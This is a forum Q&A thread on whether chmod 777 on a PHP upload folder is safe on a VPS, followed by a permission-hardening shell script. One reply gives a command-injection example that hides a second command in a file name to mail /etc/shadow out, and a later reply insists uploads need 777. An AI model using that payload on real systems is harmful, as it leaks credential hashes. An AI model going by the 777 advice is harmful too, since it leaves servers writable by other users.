Is it safe to chmod to 777 on a vps or dedicated server?

Hi,
I'm writing an upload app. in php. The uploaded files are moved and checked by php. But my client is on a shared hosting provider.
In order for php to move the files to the right folder, that folder needs to be chmod'ed to 777. I have been googling and found many people saying chmod 777 isn't safe on a shared host.
I was wondering if chmod 777 poses any security problem if the application would be hosted on a vps or dedicated server?

kind regards,
Peter
petervanlaer Asked:
kblack05 Commented:
Permissions mask 0777 is *always* dangerous because it means that anyone can read/write/execute files within that directory structure. Typically this is a managed risk, and if you must have these kinds of features it's good to investigate using the SUID features...

Have a look at this thread, it's pretty descriptive:

http://www.linuxforums.org/forum/servers/17786-working-my-way-around-0777-issue-would-suid-guid-help.html
0
 
petervanlaer Author Commented:
as far as i understand it, *everyone* having permission doesn't include the average joe on the internet, but only everyone who has an account or access to that machine.

if the machine is:

* on a shared hosting solution
* has anon ftp access or a number of other entry points the general public can use
* is a workstation that many people log into

then 777 is a bad idea. right?

feel free to correct any inaccuracies in the above; i'm not a unix guru by any stretch of the imagination, but it's my understanding 777 doesn't just mean some random joe can laser all yer stuff if they don't have an account of some sort on the machine.
0
 
kblack05 Commented:
Well here's the gist of it: if the perms are wide open, anything CAN and DOES happen. For example some hotshot out there may notice, and use your upload input bin to add special characters, such as "filetoupload.txt; sendmail user@domain.com < /etc/shadow" or some other perversion.

If you aren't rigorously verifying input in your PHP script, the Apache server may possibly be made to work against you.
0
 
kblack05 Commented:
Or rather, they may be able to upload some arbitrary scripting, and then escape the php line to run the script, and possibly hose the box, or trojan it.
0
 
xDamox Commented:
Hi,

777 permission is not secure :( on any machine. When you run your PHP script it runs as that user, so I think a directory permission of 755 will be OK for your PHP script.
0
 
kblack05 Commented:
He's running an upload program. It needs write access.
0
 
xDamox Commented:
Hi,

Yeah, but the PHP script is probably running with his permissions, so a file 755 should be sufficient, as he has read, write and execute whereas the others only have read and execute.
0
 
xDamox Commented:
Sorry, just double-checked mine; you will need 777 on uploads
0
 
ahoffmann Commented:
simple question, simple answer: no
0
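
One way to find and remove the world-write bit this thread is about, as an added example that is not part of any post above. The function names and demo paths are hypothetical, and it assumes the upload directory is owned by the account the PHP process runs as, which is something you control on a VPS or dedicated server.

```shell
#!/bin/sh
# Added example. All paths are created under a temporary directory for the demo.

# Octal mode of a path (GNU stat, with BSD stat as fallback).
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Succeeds when the "other" digit of the mode has the write bit (2) set,
# i.e. any local account can create or delete entries in the directory.
is_world_writable() {
    m=$(mode_of "$1") || return 2
    other=${m#"${m%?}"}          # last octal digit of the mode
    [ $(( other & 2 )) -ne 0 ]
}

# Every directory below a root that carries the world-write bit.
list_world_writable_dirs() {
    find "$1" -type d -perm -0002 -print
}

# Assumption: the directory is owned by the account the PHP process runs as,
# so owner write access is enough for the upload script to move files in.
harden_upload_dir() {
    dir=$1
    [ -d "$dir" ] || { echo "not a directory: $dir" >&2; return 1; }
    [ -O "$dir" ] || { echo "not owned by current user: $dir" >&2; return 1; }
    chmod 0750 "$dir"                          # rwxr-x---
    find "$dir" -type f -exec chmod 0640 {} +  # data files need no execute bit
}

# Constructed demo: a 0777 uploads directory, audited, tightened, re-audited.
demo() {
    root=$(mktemp -d) || return 1
    mkdir "$root/uploads" && chmod 0777 "$root/uploads"
    echo "before: $(mode_of "$root/uploads")"
    list_world_writable_dirs "$root"
    harden_upload_dir "$root/uploads"
    echo "after:  $(mode_of "$root/uploads")"
    is_world_writable "$root/uploads" || echo "no longer world-writable"
    rm -rf "$root"
}
demo
```

If the web server runs PHP as a different account than the one that owns the files, the ownership check in `harden_upload_dir` fails rather than silently locking the upload script out.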
Question has a verified solution.
